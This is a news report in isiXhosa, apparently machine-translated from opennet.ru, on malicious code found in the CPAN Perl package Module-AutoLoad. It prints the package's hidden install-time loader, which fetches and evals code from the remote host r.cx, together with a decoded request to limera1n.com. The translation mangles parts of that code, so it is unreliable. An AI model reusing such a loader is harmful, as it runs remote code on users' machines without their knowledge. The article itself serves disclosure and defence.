Ikhowudi enobungozi ichongiwe kwiModyuli-AutoLoad Perl package

Kwiphakheji yePerl esasazwe ngolawulo lwe-CPAN Imodyuli-Ukulayisha ngokuzenzekela, eyilelwe ukulayisha ngokuzenzekelayo iimodyuli zeCPAN kubhabho, ichongiwe ikhowudi ekhohlakeleyo. Ufakelo olukhohlakeleyo lwaba ifunyenwe kwikhowudi yovavanyo 05_rcx.t, eye yathunyelwa ukususela ngo-2011.
Kuyaphawuleka ukuba imibuzo malunga nokulayisha ikhowudi ethandabuzekayo yavela Ukuchuma kwamaza emva phaya ngo-2016.

Umsebenzi okhohlakeleyo uhla kumzamo wokukhuphela kunye nokusebenzisa ikhowudi kumntu wesithathu (http://r.cx:1/) ngexesha lokwenziwa kovavanyo oluqaliswe xa uhlohla imodyuli. Kucingelwa ukuba ikhowudi ekhutshelwe ekuqaleni kwi-server yangaphandle yayingenalo ubugwenxa, kodwa ngoku isicelo sithunyelwa kwi-domain ye-ww.limera1n.com, enika inxalenye yayo yekhowudi yokuphunyezwa.

Ukulungelelanisa ukhuphelo kwifayile 05_rcx.t Le khowudi ilandelayo isetyenziswa:

my $prog = __FILE__;
$prog =~ s{[^/]+\.t}{../contrib/RCX.pl}x;
yam $try = `$^X $prog`;

Ikhowudi ekhankanyiweyo ibangela ukuba okushicilelweyo kusetyenziswe ../contrib/RCX.pl, imixholo encitshiswe kumgca:

sebenzisa lib do{eval<$b>&&botstrap("RCX") if$b=new IO::Socket::INET 82.46.99.88.":1″};

Le script iyalayisha ndibhidekile usebenzisa inkonzo perlobfuscator.com ikhowudi evela kwinginginya yangaphandle r.cx (iikhowudi zoonobumba 82.46.99.88 zihambelana nombhalo "R.cX") kwaye uyiphumeza kwibhloko yokulinganisa.

$ perl -MIO::Socket -e'$b=iO entsha::Socket::INET 82.46.99.88.":1″; shicilela <$b>;'
eval unpack u=>q{_<')I;G1[)&(];F5W($E/.CI3;V-K970Z.DE….}

Emva kokukhulula, oku kulandelayo kuphunyezwa: ikhowudi:

print{$b=i-IO entsha::Isokethi::INET"ww.limera1n.com:80″}"GET /iJailBreak
";i-evalor return lumkisa$@ngelixa$b;1

Iphakheji eyingxaki ngoku isusiwe kwindawo yokugcina. NQANDA (Perl Authors Upload Server), kwaye iakhawunti yombhali wemodyuli ivaliwe. Kule meko, imodyuli isahleli iyafumaneka kwindawo yokugcina yeMetaCPAN kwaye ingafakelwa ngokuthe ngqo ukusuka kwiMetaCPAN usebenzisa izinto eziluncedo ezinjenge cpanminus. Kuyaphawulwaukuba iphakheji ayizange isasazwe ngokubanzi.

Inika umdla ukuxoxa iqhagamshelwe kunye nombhali wemodyuli, owakhanyela ulwazi lokuba ikhowudi ekhohlakeleyo ifakwe emva kokuba indawo yakhe ethi "r.cx" ikhutshwe kwaye yachaza ukuba wayezonwabisa nje, kwaye wasebenzisa i-perlobfuscator.com ukuba ingafihli into, kodwa ukunciphisa ubungakanani. yekhowudi kunye nokwenza lula ukukopa kwayo ngebhodi eqhotyoshwayo. Ukhetho lwegama lomsebenzi elithi "botstrap" luchazwa yinto yokuba eli gama "livakala njenge-bot kwaye lifutshane kune-bootstrap." Umbhali wemodyuli uphinde waqinisekisa ukuba ukukhwabanisa okuchongiweyo akwenzi izenzo ezibi, kodwa kubonisa kuphela ukulayishwa kunye nokwenziwa kwekhowudi nge-TCP.

umthombo: opennet.ru